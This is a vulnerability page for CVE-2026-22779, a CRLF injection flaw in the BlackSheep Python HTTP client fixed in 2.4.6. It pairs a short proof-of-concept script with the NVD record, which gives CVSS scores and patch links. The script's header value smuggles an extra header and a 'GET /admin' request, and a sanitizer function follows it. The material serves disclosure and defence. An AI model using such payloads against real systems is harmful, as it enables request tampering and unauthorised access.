CVE-2026-22779

import asyncio from blacksheep.client import Client async def crlf_injection_poc(): """ CVE-2026-22779 CRLF Injection PoC This PoC demonstrates how unsanitized user input in headers can lead to CRLF injection in BlackSheep HTTP Client. """ client = Client() # Malicious header value containing CRLF characters malicious_value = "value\r\nX-Injected-Header: malicious\r\n\r\nGET /admin HTTP/1.1" try: # This call demonstrates the vulnerability # The malicious_value is passed directly to headers without validation response = await client.get( "http://example.com", headers={"X-User-Input": malicious_value} ) print(f"Response status: {response.status}") except Exception as e: print(f"Error occurred: {e}") finally: await client.close() # Safe example - input should be sanitized before use def sanitize_header_value(user_input: str) -> str: """ Sanitize user input to prevent CRLF injection Remove or escape \r and \n characters """ return user_input.replace('\r', '').replace('\n', '') if __name__ == "__main__": asyncio.run(crlf_injection_poc())

{"cve": {"id": "CVE-2026-22779", "sourceIdentifier": "[email protected]", "published": "2026-01-14T17:16:09.150", "lastModified": "2026-01-22T15:39:31.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BlackSheep is an asynchronous web framework to build event based web applications with Python. Prior to 2.4.6, the HTTP Client implementation in BlackSheep is vulnerable to CRLF injection. Missing headers validation makes it possible for an attacker to modify the HTTP requests (e.g. insert a new header) or even create a new HTTP request. Exploitation requires developers to pass unsanitized user input directly into headers.The server part is not affected because BlackSheep delegates to an underlying ASGI server handling of response headers. This vulnerability is fixed in 2.4.6."}, {"lang": "es", "value": "BlackSheep es un framework web asíncrono para construir aplicaciones web basadas en eventos con Python. Antes de la versión 2.4.6, la implementación del Cliente HTTP en BlackSheep es vulnerable a la inyección CRLF. La falta de validación de encabezados hace posible que un atacante modifique las solicitudes HTTP (p. ej., insertar un nuevo encabezado) o incluso cree una nueva solicitud HTTP. La explotación requiere que los desarrolladores pasen la entrada de usuario no saneada directamente a los encabezados. La parte del servidor no se ve afectada porque BlackSheep delega a un servidor ASGI subyacente el manejo de los encabezados de respuesta. Esta vulnerabilidad se corrige en la versión 2.4.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-113"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:neoteroi:blacksheep:*:*:*:*:*:python:*:*", "versionEndExcluding": "2.4.6", "matchCriteriaId": "FD85CB64-1BE0-413B-A144-357F606AD016"}]}]}], "references": [{"url": "https://github.com/Neoteroi/BlackSheep/commit/bd4ecb9542b5d52442276b5a6907931b90f38d12", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Neoteroi/BlackSheep/releases/tag/v2.4.6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Neoteroi/BlackSheep/security/advisories/GHSA-6pw3-h7xf-x4gp", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}